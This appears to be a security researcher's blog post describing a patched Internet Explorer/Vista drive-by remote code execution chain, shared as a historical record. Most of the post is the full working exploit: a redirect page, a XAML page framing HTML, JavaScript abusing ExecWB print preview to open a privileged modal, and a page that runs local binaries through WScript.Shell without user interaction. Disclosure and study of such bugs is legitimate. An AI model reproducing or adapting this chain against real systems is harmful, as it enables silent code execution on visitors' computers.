Vista RCE via XAML Frame + ExecWB PrintPreview

This one surprised me. By combining two techniques — loading HTML inside a XAML <Frame> element, and then using the ExecWB IDM_PRINTPREVIEW trick to open a privileged modal — it became possible to execute arbitrary code automatically, without any user interaction beyond visiting the page. The XAML file redirected to itself through index.html, which was just a thin wrapper to avoid browser sniffing on the XAML extension.

<!-- index.html: redirects straight to the XAML -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
 <HEAD>
  <TITLE> New Document </TITLE>
 </HEAD>
 <BODY>
  <script language="JavaScript">
	location.replace("index.xaml");
  </script>
 </BODY>
</HTML>

<!-- index.xaml: XAML page that frames xamled.html -->
<Page xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
      WindowTitle="XAML_Test_Debug">
  <TextBlock HorizontalAlignment="Center" VerticalAlignment="Top">
  <LineBreak />
  <Frame Width="800" Height="470" Source="xamled.html" />
  </TextBlock>
</Page>

<!-- xamled.html: uses ExecWB to open the privileged print preview modal -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>ExecWB_IDM_PRINTPREVIEW_Several_Vulnerabilities</title></head>
<body>
<iframe id="iframeID" width="100" height="100"></iframe>

<script language="JavaScript">
var IDM_PRINTPREVIEW = 7;

function openPrintPreview()
{
	//	The IDM_PRINTPREVIEW needs a FULL URL so we first get our baseHref and then, concat it with "tricks.html" which is the name of our file.
	var myBaseHref = location.href.substring(0, (location.href.lastIndexOf("/") + 1));
	var urlTricksPage = myBaseHref + "runcalc.html";

	//	Now we open the PRINTPREVIEW modalDialog with our tricks.html inside.
	document.all.iframeID.ExecWB(IDM_PRINTPREVIEW, 0, urlTricksPage);
}

openPrintPreview();
</script>
</body>
</html>

<!-- runcalc.html: loaded inside the privileged modal, runs calc.exe and closes -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>ExecWB_IDM_PRINTPREVIEW_TricksPage</title>
<script language="JavaScript">
function executeArbitraryFile()
{
	try
	{
		oShell = new ActiveXObject("WScript.Shell");
		oShell.Run ("file:///c:/windows/system32/calc.exe", 1, true);
	}
	catch(e){}
}

function executeArbitraryFileWithArguments()
{
	try
	{
		oShell = new ActiveXObject("WScript.Shell");
		oShell.Run ("file:///c:/windows/system32/cmd.exe /k dir", 1, true);
	}
	catch(e){}
}

executeArbitraryFile();
setTimeout("window.close()",100);
//	This one works also.
//	executeArbitraryFileWithArguments()

</script>
</body>
</html>

The chain is: XAML Frame elevates the trust of the HTML it contains → ExecWB IDM_PRINTPREVIEW opens a privileged modal loading our runcalc.html → inside that modal, WScript.Shell.Run executes any local binary with no prompts. Everything happens automatically on page load. The modal briefly flickers and closes itself. Vista’s Protected Mode did add a warning dialog for the shell execution, but on Windows XP the whole chain ran silently.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [DoS: IE7 Crash via Cached SWF Document and res:// Protocol Navigation] :: [UXSS Simplification (WOOBR 977211): Cached SWF Document Without Reload] >